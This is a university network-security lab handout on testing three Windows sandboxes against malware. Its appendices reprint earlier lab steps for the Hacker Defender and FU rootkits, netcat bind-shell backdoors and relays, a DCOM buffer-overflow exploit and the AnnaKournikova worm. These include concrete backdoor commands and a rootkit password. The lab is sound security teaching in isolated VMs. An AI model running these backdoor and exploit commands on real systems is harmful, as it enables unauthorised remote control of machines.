Embed Size (px)
DESCRIPTION
Citation preview
ECE 4112 Internetwork SecurityLab X: Sandboxing
Group Number: _______________
Member Names: _________________________ _________________________
Date Assigned: Date Due: Last Edited: Lab Authored By: Gary Kao & Jimmy Vuong Fall 2007
Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE the Date Due.
Goal: This lab will introduce the concept of sandboxing, which is a way to run a program isolated from the main host system. You will be investigating what a sandbox protects you from and how not all sandboxes are created equal.
Summary: In this lab you will be running three sandbox programs: Sandboxie, Virtual Sandbox, and Shadowsurfer. These are all available for free, with limitations, online. We will use programs from previous labs such as the Hacker Defender, FU, AnnaKournikova worm, and the dcom buffer overflow exploit. We are also going to investigate features of a sandbox, such as the ability to mess with processes outside of the sandbox.
Background and Theory: Sandboxes are a type of virtualization – similar to VMware. A sandbox is supposed to try to behave like the host as much as possible. It is a simple way to safely run programs, such as untested code or untrusted code. Generally, sandboxes are a transparent layer that sits on top of the host machine, so once the sandbox is being used, anything that changes the host machine actually only changes the transparent layer. This transparent can be deleted by restarting your computer or by cleaning the sandbox, depending on the program. Some security groups firmly believe in sandboxes as the ultimate form of security, since it does not change the host’s filesystem and everything reverts back to how it was before the sandbox was used. In this lab we will examine three different Sandbox programs: Sandboxie, Shadow Surfer, and Virtual Sandbox.
1
Sandboxie extends the operating system (OS) with sandboxing capabilities by blending into it. Applications can never access hardware such as disk storage directly, they have to ask the OS to do it for them. Since Sandboxie integrates into the OS, it can do what it does without risk of being circumvented. The following classes of system objects are supervised by Sandboxie: Files, Disk Devices, Registry Keys, Process and Thread objects, Driver objects, and objects used for Inter-process communication: Named Pipes and Mailbox Objects, Events, Mutexs (Mutants in NT speak), Semaphores, Sections and LPC Ports. Sandboxie also takes measures to prevent programs executing inside the sandbox from hijacking non-sandboxed programs and using them as a vehicle to operate outside the sandbox.
Shadow Surfer captures a snapshot of your volume(s) and runs an exact duplicate in a virtual PC or server state. This virtual state, called ShadowMode, allows the user to use the PC or server as normal, but without premanently writing system changes to the hard drive. If system changes and folder or files changes occur during a ShadowMode session, then these changes can be automatically or manually committed to the PC or server. If malicious or unwanted changes occur during a ShadowMode session, then they can be discarded with a simple reboot.
Virtual Sandbox is a secure software system designed to allow unknown or untrusted programs to be run in an isolated environment without access to personal files, local networks, and system settings. With Virtual Sandbox installed, programs can be allowed to run in a discardable, carefully tailored, virtual environment that is contained and isolated from the operating system, but appears on your Windows desktop.
Lab Scenario: We will be using three identical Windows virtual machines. Take one of your virtual machines and copy it twice.
First, goto your VMware folder, which is /home/vmware. Now find your Windows XP install folder, which should be called winXPPro and copy it twice with two different folder names that you should remember. Each VM will be used for each sandbox program (Sandboxie, Virtual Sandbox, and Shadow Surfer). For example, you can do
#cp –r winXPPro Sandboxie
This will create a new winXPPro instance in the folder called Sandboxie. Do this one more time to make the 3rd Windows image.
Next, we will grab the following files from corresponding labs. You will need to remember how to use them, so we’ve included the relevant sections in each lab as appendices. :Lab5: HackerDefender (appendix A), FU (appendix B), netcat (appendix C), VNC (appendix D), IceSwordLab6: dcom exploit (appendix E)Lab8: AnnaKournikova (appendix F)Lab10: SDBot (appendix G)
2
Note that these appendices are only used to remember how to run the programs.
Links to the three sandbox programs are found in the sources section.
Section 1: Installing the Sandboxes and testingInstalling the sandboxes is relatively easy. Simply run the executables for the corresponding sandbox on each machine. For example, sandboxie.exe will install Sandboxie. On the 1st Windows VM, install Sandboxie. On the 2nd Windows VM, install Virtual Sandbox. On the 3rd Windows VM, install ShadowSurfer. After the install of each, restart the computers. When we refer to goto Sandboxie, that means to load up the 1st Windows VM, Virtual Sandbox the 2nd VM, etc.
The Sandboxie install is easy and straightforward. The Virtual Sandbox install will search your computer for files, but do not let it scan so simply click cancel. Shadow Surfer asks for a restart, allow it to do so.
Q1.1: You should notice that each PC will have something new when you start up. What did you notice about each sandbox after the restart?
First we will do the most basic sandbox test – seeing how transparent the sandbox is.
1. First, open Sandboxie by double clicking the new icon in the system tray. Now right click on the “Default Sandbox” and click “Run Application” and open “Any Application.” Now type in “explorer” and press enter. Goto the desktop and create a new file on the desktop that you remember. Now, do you see this file on your desktop?
Q1.2: Do you see the file on your desktop?
2. In Virtual Sandbox, create a text file on the desktop.3. In Shadow Surfer, create a text file on the desktop.
Also, for each VM, load up IE and ftp to the host computer (remember to load it up via the Sandboxie console in the Sandboxie VM), so if your host is a.b.c.d, then type ftp://a.b.c.d and then login. Grab a file and put it on your desktop.
Screenshot #1-3: Take a screenshot in each VM with the IE window with the copied file name highlighted and the file on the desktop in the same screenshot.
Restart all 3 computers. Once you’re booted back up, see if you can find the files on the desktop.
Q1.3: For each VM, do you see the file on your desktop?
Q1.4: Upon bootup, for each of the computers, is the FTP’d file still there?
3
Now, we will try to load a program and see how it effects the computer. This test is important because we can check whether malware can do the same thing – open a process and close the sandbox.
1. First, open Sandboxie by double clicking the new icon in the system tray. Now right click on the “Default Sandbox” and click “Run Application” and open “Any Application.” Now type in “taskmgr” and press enter. This should load up a sandboxed Task Manager (you can tell its sandboxed in Sandboxie with # # around the title). Now, try to close the sandboxie.exe process. An example is shown in the screenshot below loading IE.
2. Now, in the Virtual Sandbox computer press ALT+CTRL+DEL and this will bring up Task Manager. Virtual Sandbox sandboxes the entire system using a dialog box so there’s no direct interface to use like Sandboxie. VS *might* ask you if you want to allow Task Manager to be accessed with a sandbox. So click the Launch in Default Sandbox option (option 2). See the below screenshot for an example that uses ping. For this entire lab, you will use the “Launch in Default Sandbox” option.
4
In Task Manager, choose to close frst.exe which is the Virtual Sandbox process.
3. In ShadowSurfer, everything is sandboxed no matter what you do. You have to disable it, then restart in order to get your computer unsandboxed (but don’t do this). So press ALT+CTRL+DEL and try to close the ShadowSurfer process. It’s called ShadowProtectSvc.exe.
Q1.5: What happens with each of the three sandboxes when you try to close the sandbox?
Now for each of these computers create a file on the desktop that you remember. Next, restart the computers.
Q1.6: Upon bootup, for each of the computers, is the text file still there?
This is one major feature of a good sandbox – the ability to not interfere with the sandbox. Malware can be written that detects sandboxing and does a simple close like this. Passing this test means that the coder won’t be able to close the sandbox this easily. These tests were only to test the basic Sandbox functionality.
5
Section 2: Susceptibility to Remote Attacks and Local Attacks
Does a sandbox protect you from crashes? Sandboxes are supposed to mimic an actual host computer. So they have no real protection from crashing, but we will investigate this.
Q2.1: Since a sandbox is supposed to mimic and actual host, should it allow crashes if the host crashes?
This is a common question that is asked. Should a sandbox improve the security of the host, or simply completely mimic the host and have the same vulnerabilities as the host?
First we will test a local vulnerability, the JpegOfDeath exploit. Since our VMs are unpatched Windows XP machines, they are vulnerable.
Grab the file exploit-test.exe from NAS on each VM. Now, run this program and click yes through all the dialogs until you get the explorer window that opens up. In this Window, double click the image that is presented to you. Everything will be ran identical on all theree VMs.
Note that in Sandboxie, run all programs via the Sandboxie console, so in this case load exploit-test.exe from the console.
Q2.2: For each of the VMs, did you crash?
Your Windows should still be intact, even after you crashed.
Next, load up the dcom exploit from Lab 6 on the host computer. It is also in appendix E. Get the IP addresses of each VM and run the dcom exploit, choosing the same option as the Appendix.
Q2.3: For each of the VMs, did you crash?
In general, sandboxes don’t offer any added protection over the host, it is simply a method of virtualization to try to be similar to the host without directly affecting the host.
Section 3: Susceptibility to Rootkits, Backdoors, Worms, Botnets
6
We’ve encountered a variety of nasties from previous labs. So now we will go through some of them to see how much protection a sandbox offers, such as rootkits (HackerDefender and FU), backdoors (netcat and VNC), worms (AnnaKournikova), and botnets (SDBot).
The first exploit we will examine is the netcat exploits. Consult Appendix C for information on how to install and set up Hacker Defender. Make sure to do so for each of the simulated WinXP.
Q3.1: For each of the VMs, did netcat bypass the security?
For the ones in which netcat did manage to penetrate, load up ice sword and see if you could find hxdef.
Q3.2: Can you find hxdef in ice sword?
The first exploit we will examine is the Hacker Defender. Consult Appendix A for information on how to install and set up Hacker Defender. Make sure to do so for each of the simulated WinXP.
Q3.3: For each of the VMs, did Hacker Defender bypass the security? Next comes VNC. Load up VNC (as shown in Appdneix D) on all three computers, doing what is necessary on each to ensure that the program is run in sandbox mode. Next, attempt to connect to it from your host Linux Redhat computer.
Q3.4: For each of the VMs, did VNC bypass the sandbox security?Q3.5: For the ones in which VNC did not manage to connect, what happened?
Load up FU next (consult Appendix B for more information) on all three WinXP.
Q3.6: For each of the VMs, did fu bypass the sandbox security?
For the ones that did get bypassed, now choose a process to hide. After doing so, open up Ice Sword again and try to find the file that was hidden.
Q3.7: Can you find the process in ice sword?
Now we will work with the AnnaKournikova worm from lab8. Look to Appendix F for how to run it on each VM. Press ALT+CTRL+DEL and close wscript.exe.
Q3.8: For each of the VMs, did all of them load the worm correctly? Why or why not?
On each VM, run the registry editor with the command “regedit.” In Sandboxie, you’ll need to run this through the console, as usual. Go to the registry entry that the worm created (HCKU\software\OnTheFly).
7
Screenshot #4-6: Take a screenshot showing this registry entry
Additionally, in Sandboxie, go to Start > run and type in regedit. Press enter. Now, try to goto the OnTheFly registry entry.
Q3.9: Is this registry key there? Why or why not?
Next we will load up the SDBot on each VM, one by one. See Appendix G for instructions on how to create the SDBot. Also remember to load up the irc server on the RedHat host computer that we did in lab 10 with the command:
# /usr/local/sbin/ircd –s
Load the bots up one by one because SDBot chooses a random name, so you won’t know which VM loaded which SDBot.
Q3.10: Did SDBot load up successfully on each VM? If not, why?
Section 4: Clearing the Sandbox
From everything we’ve installed from section 3, how clean are the sandboxes?
8
In the screenshot above, one can see that the regedit instance is ran via Sandboxie, while the left instance is the normal regedit instance. The sandboxed instance has the OnTheFly registry entry unlike the normal one. Sandboxie does indeed make a transparent layer on top of Windows. If you check for the Hacker Defender or SDBot registry entries, you will notice the same thing.
Each of the 3 VMs has been infected in some way or another, so now we can see if each sandbox does what its meant to do – erase all traces of work done from previous sandboxes. To do this, restart all the VMs. You can also manually clear the sandboxes, but restarting is far easier.
Q4.1: After the restart, did you notice any of the programs we used in section 3 load up? If so, what programs are active?
Screenshot # 7-9: Take a screenshot of the OnTheFly registry key, or where it would be
Q4.2: What sandbox do you prefer? Why?
9
Section 5: Defenses Along With the Sandbox
Sandboxes are vulnerable to the same thing the main machine is vulnerable to. In this lab, we found that sandboxes alone are not powerful because their goal is to emulate the Windows machine, rather than prevent malware from getting on your computer in the first place.
Running programs sandboxed is safe because any files that are stored will be removed so no permanent damage can be done. This is ideal for a browser that may download malware to your computer for example, since all you need to do is clear the sandbox. The main weakness is that malware can still be executed normally, but you can get rid of malware by clearing the sandbox. Used in conjunction with anti malware, anti virus, and a firewall will greatly increase the chances of getting any permanent infection. We have already investigated anti-viruses and firealls in previous labs but the threats that got past these defenses have to save files on your computer. Since sandboxes don’t allow permanent storage, these threats are not nearly as dangerous to us as without a sandbox.
For those users that already have an anti-virus and firewall, sandboxes can add an extra layer of protection to ensure that if anything gets past the anti-virus and firewall, you are safe. Also the biggest reason that use of sandboxes is growing now is because of the threat of Botnets. Since some botnet programs can be undetectable by anti-viruses and firewalls, a sandbox is a way to protect from the undetectable. However, more sophisticated botnet programs are able to detect sandboxes and as time passes, they may be able to get past sandboxes.
10
Appendix A: Hacker Defender (excerpt from lab 5)
Section 4: Hacker Defenderhttp://hxdef.org/
First, make a copy of your winXPPro virtual machine by opening a terminal in you Linux WS 4.0 physical machine and typing:
#cp –r winXPPro winXPPro.bak (assuming winXPPro is the name of your folder)
Now start you Windows XP Virtual Machine. The remainder of this section of the lab will be done on this machine.
This rootkit rewrites memory segments in all running processes to change their behavior. It has been available for about a year and would be detected by almost any antivirus program. For more on the program and its usage than what is in this lab, see the readme file (readmeen.txt) or go to the website.
Copy all the Lab5/Windows folder files from the NAS to a new folder on your Desktop named “hacker”.
This rootkit is run by typing the executable, hxdef100.exe, and specifying a .ini file to use. The .ini file has information on what files, processes or ports to hide, as well as information on the backdoor it creates on the system. We will be using kitfile.ini for this lab, you can double click on it and it will open in Notepad. There are 9 headings required, though we will only be looking at a few in this lab. The first heading, [Hidden Table], is the list that tells the program what files, directories and processes to hide. Right now it has root* and rcmd.exe as the only entries. This means that it will hide any file, folder or process that starts with root and the rcmd.exe process. The next heading, [Root Processes], is a list of programs that will be “immune” to the infection, meaning they will still be able to see hidden files and processes. [Hidden Services] is a list of services that will be hidden from the database of installed programs. In [Settings], the last heading, is information on backdoors as well as how things are run, we will not be modifying this part at all, but make note of the Password. For more information on what all these do, again, see the readme file.
Create a folder on your desktop called “roottest”.Go to StartRuncmd.
cd to the “hacker” folder with the rootkit files.Type: hxdef100.exe kitfile.iniYou have just installed and run the rootkit. On your desktop, Right Click and go to Refresh. Q4.1: Can you still see the folder you just created?
Now hold ALT + CTRL + DELETE and click on the processes tab to see what is running.
11
Q4.2: How do we know that Hacker Defender is running on our machine?
Now it is time to hide the Hacker Defender process. Open up kitfile.ini and add the following line under [Hidden Table]:hxdef*Save the file.Kill the existing hxdef process and rerun hxdef100.exe kitfile.ini
Q4.3: Again look at what processes you are “running,” are you still able see that Hacker Defender is running?
You can do this with any process, i.e. IE (Internet Explorer) but you would need to be careful hiding some system process that would stop your computer from functioning properly. Just for fun I added * to [Hidden Table] and hid all files and processes, of course, I was not able to run anything after that and could not even stop Hacker Defender from running, luckily I had backed up my Virtual Machine image and did not lose everything.
Now we will use the backdoor feature of the rootkit. Once the rootkit is installed, all TCP ports become potential backdoors. This includes port 80, used for web servers. One of the web servers on the network has been infected with this kit, using a .ini file similar to yours, so the backdoor has the same settings. The server is http://57.35.5.16, which is the StorageRus Webserver. You can see the home page by typing the IP address into a web browser. The file bdcli100.exe will let us remotely connect to this server, through port 80, with administrator privileges. Again in your cmd window, type:
bdcli100.exe 57.35.5.16 80 hxdef-rulez
This is the host, port and password to use when connecting. Because we have hidden Hacker Defender processes and rcmd.exe, there is no simple way of seeing that we have connected. Also, it was shown in tests that IIS does not log any of this connection.
Once you have logged on through the backdoor, you might as well have some fun. In c:\\Inetpub\wwwroot is a file called default.htm. This is the homepage for the web server. You can edit a file by typing:
#edit <filename>Do this with default.htm and add your group number, names and a brief message in the body so it shows up on the homepage.Pressing ALT brings you to the menu options on the top of the screen, save your file and exit.Now type:
#exitYou have just terminated your backdoor connection.On your own machine type:
# net stop HackerDefender100Make sure the hidden files are revealed. This ends this portion of the lab. Again, if something was lost or damaged, you can delete this Virtual Machine folder and use the backup you made at the beginning of this section with:
12
#rm –rf winXPPro#mv winXPPro.bak winXPPro
13
Appendix B: FU (excerpt from lab 5)FU - A rootkit that hides from RootkitRevealer
FU [https://www.rootkit.com/vault/fuzen_op/FU_Rootkit.zip] is a new breed of rootkits that uses advanced hiding techniques to evade detection.
The FU rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that forensics is impossible, and even hide device drivers. It does all this by Direct Kernel Object Manipulation™ – no hooking! This project has been evolving over time. It was originally conceived as a proof-of-concept. FU is a play on words from the UNIX program "su" used to elevate privilege.
Installing Rootkit Revealer: Get FU_Rootkit.zip from the NAS, copy it to your XP VM, and extract the directory.
Using this rootkit to hide a process
To use this rootkit to hide a process, extract the rootkit.
In the command window, browse to the EXE folder and type fu –pl 100This will list all the running processes.
C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -pl 100
Process: fu.exe:1964Process: :2153006656Process: System:4Process: smss.exe:364Process: csrss.exe:512Process: services.exe:588Process: lsass.exe:600Process: svchost.exe:1088Process: explorer.exe:1368Process: spoolsv.exe:1440Process: VMwareTray.exe:1528Process: VMwareUser.exe:1536Process: pbagent.exe:1544Process: msmsgs.exe:1552Process: pbhubsrv.exe:1744Process: VMwareService.e:1824Process: wuauclt.exe:720Process: cmd.exe:1572Process: taskmgr.exe:1196Process: RddootkitReveal:892Process: RDOCUQWQJDXPGBA:1448Total number of processes = 21
Now, select any process and note its PID [We selected RDOCUQWQJDXPGBA : 1448]
Type fu –ph 1448 (Or whatever PID you choose)
C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -ph 1448
C:\Documents and Settings\user1\Desktop\FU_Rootkit\FU_Rootkit\EXE>fu -pl 100Process: fu.exe:124Process: :2153006656
14
Process: System:4Process: smss.exe:364Process: csrss.exe:512Process: services.exe:588Process: lsass.exe:600Process: svchost.exe:1088Process: explorer.exe:1368Process: spoolsv.exe:1440Process: VMwareTray.exe:1528Process: VMwareUser.exe:1536Process: pbagent.exe:1544Process: msmsgs.exe:1552Process: pbhubsrv.exe:1744Process: VMwareService.e:1824Process: wuauclt.exe:720Process: cmd.exe:1572Process: taskmgr.exe:1196Process: RddootkitReveal:892Total number of processes = 20
Q6.3: Take screenshots of the process list before and after you hide a process. (Screenshot P1 #3, #4)
Q6.4: Does Rootkit Revealer detect the presence of this rootkit ?
15
Appendix C: Netcat (excerpt from lab 5)
Section 9. Installing and Using Netcat
Note: Netcat for Linux may be obtained from the web at http://www.atstake.com/research/tools/network_utilities/
Installing Netcat on the Windows machineStart your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2).
Installing Netcat on the Linux WS4 machineYou should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t, get it from /mnt/nas4112/Tools/Linux/tools, after mounting the NAS server. Go into your /home/tools directory and execute the following commands:
#tar xvfz netcat.tar.gz#cd netcat#make linux#cp nc /usr/local/sbin
The last command will allow you to run Netcat without having to specify this directory.
Using NetcatThe executable program on both operating systems is called nc and the options are the same on both systems. To run Netcat in client mode so that it sends data across a network, use
#nc [IP Address to send to] [Port to send to](e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)
All input is through standard in, so whatever you type on the keyboard will be sent to the other machine. Alternatively, if you would like to read data from a file and pipe that through to the other machine, use
#nc [IP address to send to] [Port to send to] < [File to read from](e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)
To stop Netcat, one simply has to press Ctrl+C. There are several different options that Netcat can be run with, depending on what it is being used for. The most common options are:
-l specifies that Netcat is running in listening mode-p specified which port Netcat should listen on-v verbose mode so that all results are displayed-w maximum amount of time (in clock ticks) to wait for a response-z specifies that Netcat should send very minimal data, usually a synchronized
packet to see if a response is obtained
16
-e Allows Netcat to execute a program to receive or generate network traffic
Look at the README files on both systems under the Netcat folder to find out more information about running Netcat. Many uses for netcat are found in the readme.
To run Netcat in listen mode, use the -l and -p options. The command syntax would be:#nc -l -p [port to listen to]
If you want to store the input that is received, you can pipe all the received data to a file, using the following command:
#nc -l -p [port to listen to] > [file to write to] (for windows no spaces around >)(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to
testfile.txt).NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten.
Netcat can also be used to scan ports using the following command (Netcat is being used in client mode for this):
#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan](e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the
system with IP address a.b.c.d)
Netcat can also be used to create backdoors on systems. Attackers can push a shell between systems over any TCP or UDP port. The shell will have the privileges of the user that executes Netcat in listener mode on the machine being exploited. For example, if you are on the Linux machine and would like to execute commands on the Windows machine, set up the Netcat listener on the Windows machine with the following command (from the nc11nt directory):
#nc -l –p [port to listen to] -e cmd.exe (e.g. nc -l -p 7777 -e cmd.exe This will pipe all input received at port 7777 to cmd.exe, which will then execute the commands. )
On the client side, simply type#nc [listening machine] [port to connect to](e.g. nc a.b.c.d 7777)
and start typing in your commands.
A fourth popular use of Netcat is to create relays whereby an attacker uses several intermediate systems while actually attacking a target system. Thus, detection of where the attack originated from is very painful and sometimes impossible process.
Exercise 9.1: Netcat File Transfer
Use Netcat to transfer the password file from your Linux to your Windows machine. Store the data you receive in passwd.txt. Now try transferring a binary file (e.g. .rtf file) from the Windows system to the Linux system and then transfer it back to the Windows system, saving it
17
under a different filename.
Q9.1.1. Is the binary filing the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth.
Q9.1.2. What can you say about Netcat’s ability to transfer binary files?
Exercise 9.2: Netcat Backdoors
This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener on your Windows machine. Use the options to pipe the output to cmd.exe shell. Select any port number to listen to and connect to this backdoor by running Netcat in client mode on your Linux machine. Now type in some simple DOS commands like dir and mkdir. Then try running some complex commands and examine the extent of information that you can gain from the system.
Q9.1.3. What do you conclude from this?
Exercise 9.3: Netcat RelaysNote: This exercise requires the use of both the windows machines.
In this exercise you will create a relay on your Linux machine using the Netcat listener and client. This relay will forward data from one windows machine to the other. The Netcat client will be running on the first XP machine while the listener will be running on the second XP machine. Once established, the relay should allow you to access the second XP machine from the original XP machine.First create a backdoor shell on the new XP machine, using the Netcat listener. You can create a backdoor shell by (cd into the folder where netcat is located)
# nc -l -p <listening port> -e cmd.exe(e.g. nc -l -p 56789 -e cmd.exe)
Creating a relayA way to create a relay is to tie the input and output of a Netcat listener and client together using a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out mode. You can create a FIFO and use it to link a Netcat listener to client by typing the following in Linux:
# mknod backpipe p # nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe
portA – Port on which the relay is listeningportB – Port on the target machine on which the backdoor shell is listeningtarget computer – The target XP machine (XP Machine 2). Make sure its ip is different from your other XP machine.
18
Note: Do not put spaces around the '<' or '>' signs. They direct the standard input and output streams in Linux, into backpipe and cannot have spaces next to them.
e.g. nc -l -p 12345 0 <backpipe | nc e.f.g.h 56789 1 >backpipeThe line above creates a relay listening on TCP port 12345 and forwards the data to TCP port 56789 of the machine on which the backdoor shell was created.
For this relay to work, you have to allow packets into the listening port on your linux machine. If the default Linux firewall iptables is running, it won’t allow these packets. So disable it by typing
# /etc/init.d/iptables stopAfter creating the relay and listener, connect to the relay by typing
#nc [relay machine] [portA]on the original XP machine.
Now try some other commands on the target machine and see what all you can do.
Run the command called ipconfig in the shell. This will show you the ip address of the target machine. Open up another cmd.exe window on your client machine and do ipconfig again to see the ip address of the machine you’re connecting from. Position these windows so that both the ip addresses are visible.
Take a screenshot of these windows and submit it with your report. You can use the “Print Screen” key to capture the screen and then paste it into the paint application.
(Screenshot P2#1)
Hint: In this exercise, you used Netcat the following four times:
1. As a listener in the relay on your Linux machine
2. As a client in the relay on your Linux machine
3. As a listener, running the shell on the second XP machine
4. As a client on the first XP machine, where commands can be typed to be sent to the relay.
Q9.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Exercise 9.4: Other uses of Netcat
Q9.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail).
19
Q9.1.6. What defenses could you use against an attack like a netcat backdoor?
20
Appendix D: VNC (excerpt from lab 5)Section 11. Installing and Using Virtual Network Connection (VNC)
You can obtain VNC from the web at http://www.realvnc.com/
VNC is an application level Trojan backdoor. It allows remote access to a system, and can be used for legitimate remote system administration purposes. However, it can also be exploited by hackers since VNC allows a person to change all configurations that they have permission to change. Typically, the VNC server is installed on the system that is to be remotely administered and the client is installed on the administrator’s system. Therefore, if the server was installed by a user with administrator privileges and is running under that account, an attacker that uses the VNC server would have full access to all functions of the system.
Installing and Using VNC on both Windows MachinesCopy the file vnc_x86_win32 folder from the NAS server’s tools/Windows folder to the tools folder on your hard drive.
1Change into the vnc_x86_win32/winvnc directory and double click the Setup program2Click OK on warning about installation of previous version.3Click Next4Click Yes on License Screen5Click Next for destination location default6Click Next for Program, Folder default7Click Finish
To run the Windows VNC server, 1. From the Start menu, select All Programs ->VNC -> Run WinVNC (App Mode)2. Enter a password to be used for VNC connections. Remember this password as it will be required for access to the VNC server by a client. This password prevents other attackers from using the VNC server3. Click OK. The server is now waiting on the Windows machine.
Switch to the XP copy. To run the Windows VNC client, simply click on “Run VNCviewer”. You will be prompted for the IP address of the system on which the server is running and the password to access that server. Once you have entered both, you should see a GUI come up with a terminal window.
Installing and Running VNC on the Linux MachineSwitch to the /home/tools directory, where you extracted all the linux tools, and run the following command:
#tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgzGo into the VNC directory that is created. You will see that there are five different executable programs. Go ahead and read the README file as this will provide you with explanations about
21
what each of the executables do. For example, to run the VNC client, simply type
# ./vncviewerWhen prompted for the machine of which the server is running, type in the Windows machine’s IP address. At the next prompt, type in the password. And then you should see a GUI of the Windows machine appear on the Linux system.
To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin directory. This puts them in the Linux path. To do this type
#cp vnc* /usr/local/bin#cp Xvnc /usr/local/bin
Then simply type#vncserver
Establish a password for the connection and remember this to connect to the Linux machine. Make sure that after using VNC on the Linux system, you end each VNC process after completion, otherwise the port that it listens on will be incremented when the next VNC process is created.
NOTE: To make sure that you can connect to the VNC server running on the Linux system, you have to modify the iptables to allow connections to TCP port 5901 since this is the port that the VNC server runs on by default. Access to this port is normally blocked off (to check this out, run nmap on the Linux system) by the built in firewall in Redhat. Instructions on how to edit the iptables list are given below. Note that the change you make to the iptables is only temporary and will be lost the next time you reboot the system.
Modifying IP tables:To allow packets coming in destined for the VNC server, type:
# iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT
If you still cannot connect from Windows then you might need to enter the exact port you just opened in the firewall.To do this, when you enter the host in VNC viewer, enter host:porte.g. a.b.c.d:5901
On Windows, you will see another virtual desktop, not the normal user’s desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows.
Exercise 11.1: Windows VNC Server
Set up a VNC server on your windows machine and connect to it from your Linux machine using the Linux VNC viewer. Try running a couple of different programs, including the password cracking software. Since you are logged on as an administrator, you should be able to do anything.
22
Q11.1.1. How would you detect that VNC was installed and/or running on your Windows machine?
Exercise 3.2: Linux VNC Server
Start a VNC server on your Linux machine and try to control it from your Windows machine using Windows VNC viewer. Run several different programs as well as view the password and shadow files.
Q11.1.2. How would you detect that VNC was installed on your Linux machine?
Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer (Windows) accessing the VNC server. Turn these in with your report. (Screenshots P2#3, P2#4)
An easy way to take a screenshot in is to press the Print Screen key. A window will come up, asking you for the name of the file. The format PNG is a standard picture format that can be printed from your linux lab printer or a Windows computer.
Q11.1.3 What defenses could you use against an attack like VNC?
Go ahead and close all your VNC client windows and stop the VNC server.
23
Appendix E: DCOM Exploit (excerpt from lab 6)
Section IV – A Contemporary Vulnerability
Buffer overflow vulnerabilities are extremely common in modern computing. In the final section, we will observe a vulnerability that exists in Windows 2000 Serivce Packs 0-4 and Windows XP Service Packs 0-1. The vulnerability was eventually patched in August, 2003.
The vulnerability makes use of the Windows DCOM RPC service, which is run automatically with Administrator privileges on both TCP and UDP port 135. The service is designed to allow computers to request services from each other, however it does no size checking on the input buffer.
Connect to Network Attached Storage, and copy the file Lab6/dcom.c to your Red Hat 7.2 machine. Compile dcom with:gcc –o dcom dcom.cNow run ./dcomto see your command line options.
Your target will be your Windows XP Machine. It is currently not running any service packs (SP0).
Run the exploit, and if you receive a command prompt execute several commands such as dir and cd. Copy your results to a text file and include it with your report.
After you exit, this exploit will cause Windows XP to crash.
16) Take a screenshot of your crashing system and include it with your report.
(Note: depending on the status of your Windows XP system, it is possible that this vulnerability will cause XP to crash immediately. If so, allow it to reboot and try again).
For a very long time, this exploit could be used to install a backdoor and/or crash any Windows 2000 or Windows XP machine remotely.
17) What steps could a system administrator take to prevent this problem?
24
Appendix F: AnnaKournikova (Excerpt from lab 8)
Section 2: A real world worm, AnnaKournikova
We have already given you some background information on this worm, now it is time to analyze it to see how it works. Run the copy of the Windows XP virtual machine you have created in a previous lab. You should have acquired the file AnnaKournikova.jpg.vbs.txt (actual VBScript file) from the lab8 folder on the NAS machine and placed it in a desktop folder called “anna.” We have supplied you with the Source code in Appendix C. Once you have acquired these files, make sure that your network cable is still unplugged.
First, let us analyze the source code of this worm. Look at Appendix C. This code can be appreciated even for someone who is not familiar with the VBScript language. The subject line and the body of the e-mail should also be clearly defined to you and with a little work you will be able to see what is going on. Note that at end it writes something to “HCKU\software\OnTheFly”.
Q2.1: How does the function doMail() help in spreading the virus?Q2.2: Other than spreading, what is the purpose of this virus?Q2.3: On what day will this happen?Q2.4: How can you help prevent the spreading of this virus?
Now that we have a good feel on how the worm works, let us now run the VBScript file. Take off the “txt” extension from the file AnnaKournikova.jpg.vbs.txt file so that Windows now recognizes it as an executable file instead of a text file. This can be done by opening up a cmd prompt in windows and typing:
#cd Desktop#cd anna#rename AnnaKournikova.jpg.vbs.txt AnnaKournikova.jpg.vbs
Now go to your “anna” folder and double click on the file.
25
Now run the Windows Task Manager by pressing the key combination Ctrl-Alt-Delete. Click on the Processes tab and you should see a window like in Figure 1.
Figure 1. Processes outlined in Windows Task Manager.
Don’t you find the fact that CPU Usage is near 100% a little strange for an idle machine? If you look at the processes listed, you will find an executable using most of the CPU resources (in the case of Figure 1, it is wscript.exe). By ending this process, you should notice, in the Performance tab, that the CPU usage should drop down to what is normally expected of an idle machine.
Go ahead and run the VBScript file again, and you should notice the CPU Usage again jump back up to nearly 100%. This type of system performance anomaly is one way to detect whether a worm is trying to execute its code. Now make sure you end the worm process before you proceed further.
Now let us research what files and registry entries are associated with the worm. Go to this website: http://www.ciac.org/ciac/bulletins/l-046.shtml
This site contains information and the history of the AnnaKournikova worm. Notice that some of the information presented is the same as what we deduced from the source code. There are many other database sites that you can find to help research on removing various virus/worms, but we found this site to be the most useful in learning the worm’s effects.
Q2.5: What is one way in which anti-virus programs detect worms and viruses? Give an example (hint: look at the source code for the AnnaKournikova script)
